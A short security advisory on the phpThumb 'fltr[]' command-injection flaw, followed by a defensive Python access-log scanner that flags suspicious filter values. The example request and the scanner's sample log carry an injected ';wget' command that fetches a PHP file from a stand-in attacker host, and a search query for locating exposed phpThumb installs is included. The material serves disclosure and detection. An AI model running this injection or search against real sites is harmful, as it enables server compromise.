phpThumb “fltr[]” security vulnerabilities

Example of a malicious request (a shell command is appended to the fltr[] filter value):
http://www.my-helper.com/web_assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://www.hacker.com/hack.php;&phpThumbDebug=9

How hackers find your site (a search-engine query for the phpThumb.php path):
http://www.google.com.ng/search?q=/components/assets/+phpThumb.php&start=940&sa=N&hl=en&sout=1&biw=1280&bih=677&site=imghp&tbm=isch&itbs=1&sa=X&ved=0CDMQrQMwBDisBw

Fix:
Update phpThumb to version 1.7.11 (http://sourceforge.net/projects/phpthumb/)
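
To check whether requests like the example have already reached a server, this added example (not part of the original post or of phpThumb) scans access-log lines for phpThumb.php requests whose decoded fltr[] values contain anything outside a small allowlist. The allowlist, the function names and the sample log entries are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate filter values on this site use only these characters.
# "|" is allowed because phpThumb separates filter parameters with it (blur|9).
ALLOWED_RE = re.compile(r"[A-Za-z0-9|.,_#-]*")

def suspicious_filters(log_line):
    """Return decoded fltr[] values of a phpThumb request that break the allowlist."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    path, _, query = match.group(1).partition("?")
    if not path.lower().endswith("/phpthumb.php"):
        return []
    hits = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        # Decode both sides so fltr%5B%5D= and %3B / %20 cannot hide anything.
        name, value = unquote_plus(name), unquote_plus(value)
        if name.lower().startswith("fltr") and not ALLOWED_RE.fullmatch(value):
            hits.append(value)
    return hits

def scan(lines):
    """Return (client_ip, flagged_values) for every line with a flagged filter."""
    results = []
    for line in lines:
        hits = suspicious_filters(line)
        if hits:
            results.append((line.split(" ", 1)[0], hits))
    return results

# Constructed sample entries; the second carries the request from this page's example.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2012:10:01:02 +0000] "GET /web_assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9&w=200 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [12/Mar/2012:10:04:41 +0000] "GET /web_assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://www.hacker.com/hack.php;&phpThumbDebug=9 HTTP/1.1" 200 311',
    '203.0.113.7 - - [12/Mar/2012:10:05:00 +0000] "GET /web_assets/phpThumb/phpThumb.php?src=a.jpg&fltr%5B%5D=gam|1.2 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, values in scan(SAMPLE_LOG):
        print(ip, values)
```

A hit shows that such a request was received, not that it succeeded; sites that pass other characters in filter values need a wider allowlist.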


